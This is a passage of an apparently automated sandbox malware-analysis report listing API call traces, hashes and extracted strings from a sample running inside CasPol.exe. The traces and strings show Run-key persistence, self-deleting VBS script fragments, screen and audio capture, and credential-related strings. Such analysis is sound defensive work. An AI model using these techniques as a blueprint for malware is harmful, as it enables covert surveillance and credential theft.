                                                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 004180A3
                                                                                                                  • GetCursorInfo.USER32(?), ref: 004180C5
                                                                                                                  • GetIconInfo.USER32(?,?), ref: 004180DB
                                                                                                                  • DeleteObject.GDI32(?), ref: 0041810A
                                                                                                                  • DeleteObject.GDI32(?), ref: 00418117
                                                                                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00418124
                                                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418154
                                                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 00418183
                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181CC
                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181EF
                                                                                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 00418258
                                                                                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041827B
                                                                                                                  • DeleteDC.GDI32(?), ref: 0041828F
                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418292
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00418295
                                                                                                                  • GlobalFree.KERNEL32(00CC0020), ref: 004182A0
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00418354
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 0041835B
                                                                                                                  • DeleteDC.GDI32(?), ref: 0041836B
                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00418376
                                                                                                                  • DeleteDC.GDI32(?), ref: 004183A8
                                                                                                                  • DeleteDC.GDI32(00000000), ref: 004183AB
                                                                                                                  • DeleteObject.GDI32(?), ref: 004183B1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                                                                                  • String ID: DISPLAY
                                                                                                                  • API String ID: 1352755160-865373369
                                                                                                                  • Opcode ID: 545df083f5f8f775bec5cd45ee69504d007fb648be419a0b1d313c64b3242661
                                                                                                                  • Instruction ID: 6b2ada92df8522405a2cca839f58df11a8e30ba3d3d74bda048dad66fb1953bf
                                                                                                                  • Opcode Fuzzy Hash: 545df083f5f8f775bec5cd45ee69504d007fb648be419a0b1d313c64b3242661
                                                                                                                  • Instruction Fuzzy Hash: 39C17C71508344AFD3209F25DC44BABBBE9FF88751F04092EF989932A1DB34E945CB5A
                                                                                                                  APIs
                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                                  • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                                    • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                    • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                    • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                    • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                                  • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                                    • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                    • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                    • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                  • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                                  • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                                    • Part of subcall function 0041B59F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
                                                                                                                    • Part of subcall function 0041B59F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
                                                                                                                    • Part of subcall function 0041B59F: CloseHandle.KERNEL32(00000000), ref: 0041B61C
                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                                  • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                                  • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                                    • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                                  • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                                  • API String ID: 4250697656-2665858469
                                                                                                                  • Opcode ID: 0f3d8273c2450781682a40f4251623d23898c6c12ff08a1a6ea7cde3ae6d6a1f
                                                                                                                  • Instruction ID: e3cce03e36166c77d6950284f165d3805ee2b23d785f43ba83868d4dcf2b0e5d
                                                                                                                  • Opcode Fuzzy Hash: 0f3d8273c2450781682a40f4251623d23898c6c12ff08a1a6ea7cde3ae6d6a1f
                                                                                                                  • Instruction Fuzzy Hash: 1651B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                    • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                                    • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                    • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                    • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                    • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                                  • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                  • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                  • API String ID: 3797177996-1998216422
                                                                                                                  • Opcode ID: 4fbe5e964353057208d63472bf77b8e21c80dda7ec5e7c4c15e1be7b02e28e2a
                                                                                                                  • Instruction ID: f1dcdd4a9e546d4cb200c8239a9b7392f8c22d31b5939825df829b517cfed74e
                                                                                                                  • Opcode Fuzzy Hash: 4fbe5e964353057208d63472bf77b8e21c80dda7ec5e7c4c15e1be7b02e28e2a
                                                                                                                  • Instruction Fuzzy Hash: 088190316042005BC315FB21D852ABF77A9ABD1308F10453FF986A71E2EF7CAD49869E
                                                                                                                  APIs
                                                                                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2C2
                                                                                                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2D6
                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2FE
                                                                                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A30F
                                                                                                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A350
                                                                                                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A368
                                                                                                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A37D
                                                                                                                  • SetEvent.KERNEL32 ref: 0041A39A
                                                                                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A3AB
                                                                                                                  • CloseHandle.KERNEL32 ref: 0041A3BB
                                                                                                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3DD
                                                                                                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3E7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                                  • API String ID: 738084811-1408154895
                                                                                                                  • Opcode ID: 34c9b7c386d9b976f4a833e2789a2a9ffd4d080efd6be91700f5a66860160ded
                                                                                                                  • Instruction ID: 916def08b3adcafa46b043c64cdff30cc67d21214e861a912cda69be872b019d
                                                                                                                  • Opcode Fuzzy Hash: 34c9b7c386d9b976f4a833e2789a2a9ffd4d080efd6be91700f5a66860160ded
                                                                                                                  • Instruction Fuzzy Hash: B951C1712442056AD214BB31DC86EBF3B9CDB91758F10043FF456A21E2EF389D9986AF
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                                  • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                                  • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                                  • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Write$Create
                                                                                                                  • String ID: RIFF$WAVE$data$fmt
                                                                                                                  • API String ID: 1602526932-4212202414
                                                                                                                  • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                  • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                                  • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                  • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                  • API String ID: 1646373207-165202446
                                                                                                                  • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                  • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                                  • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                  • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                                  APIs
                                                                                                                  • _wcslen.LIBCMT ref: 0040BC75
                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                                  • _wcslen.LIBCMT ref: 0040BD54
                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040BDF2
                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                                  • _wcslen.LIBCMT ref: 0040BE34
                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                                  • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                  • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open$BG$BG
                                                                                                                  • API String ID: 1579085052-1280438975
                                                                                                                  • Opcode ID: 2d304c15f4e1f7a33ee26e5bac1824232192d3ef6427a9269418118ddfb41cfb
                                                                                                                  • Instruction ID: 2f106158a8217a69bc194f5c9bf89c81f007fa4859a00edafeef48886470f02c
                                                                                                                  • Opcode Fuzzy Hash: 2d304c15f4e1f7a33ee26e5bac1824232192d3ef6427a9269418118ddfb41cfb
                                                                                                                  • Instruction Fuzzy Hash: DC51B1212082006BD609B722EC52E7F77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                    • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                    • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                  • _strlen.LIBCMT ref: 10001855
                                                                                                                  • _strlen.LIBCMT ref: 10001869
                                                                                                                  • _strlen.LIBCMT ref: 1000188B
                                                                                                                  • _strlen.LIBCMT ref: 100018AE
                                                                                                                  • _strlen.LIBCMT ref: 100018C8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _strlen$File$CopyCreateDelete
                                                                                                                  • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                  • API String ID: 3296212668-3023110444
                                                                                                                  • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                  • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                  • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                  • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                  APIs
                                                                                                                  • lstrlenW.KERNEL32(?), ref: 0041B1E6
                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 0041B1FE
                                                                                                                  • lstrlenW.KERNEL32(?), ref: 0041B217
                                                                                                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B252
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B265
                                                                                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B2A9
                                                                                                                  • lstrcmpW.KERNEL32(?,?), ref: 0041B2C4
                                                                                                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2DC
                                                                                                                  • _wcslen.LIBCMT ref: 0041B2EB
                                                                                                                  • FindVolumeClose.KERNEL32(?), ref: 0041B30B
                                                                                                                  • GetLastError.KERNEL32 ref: 0041B323
                                                                                                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B350
                                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 0041B369
                                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041B378
                                                                                                                  • GetLastError.KERNEL32 ref: 0041B380
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                  • String ID: ?
                                                                                                                  • API String ID: 3941738427-1684325040
                                                                                                                  • Opcode ID: 253fbf654c2f5cfaca5092a796830cee54c98e46980e450b9e065df1a1912948
                                                                                                                  • Instruction ID: cf02e0f6f7b7a0e02f5bf76754478950043962dc0518326da89db1c5b002f683
                                                                                                                  • Opcode Fuzzy Hash: 253fbf654c2f5cfaca5092a796830cee54c98e46980e450b9e065df1a1912948
                                                                                                                  • Instruction Fuzzy Hash: CC4163715087099BD7209FA0EC889EBB7E8EF44755F00093BF951C2261E778C998C7D6
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _strlen
                                                                                                                  • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                  • API String ID: 4218353326-230879103
                                                                                                                  • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                  • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                  • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                  • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3899193279-0
                                                                                                                  • Opcode ID: 3115d919f98adbdf348e15764fef8bbbb7a878b40742b6c11840eb3b67a2620e
                                                                                                                  • Instruction ID: 310171947c9992e3776b826429fe42b14e002c37e8c837d056816c81c4ebeb3e
                                                                                                                  • Opcode Fuzzy Hash: 3115d919f98adbdf348e15764fef8bbbb7a878b40742b6c11840eb3b67a2620e
                                                                                                                  • Instruction Fuzzy Hash: A7D13A71900310AFFB35AF7B888266E77A4BF06328F05416FF905A7381E6799D418B99
                                                                                                                  APIs
                                                                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00413F27
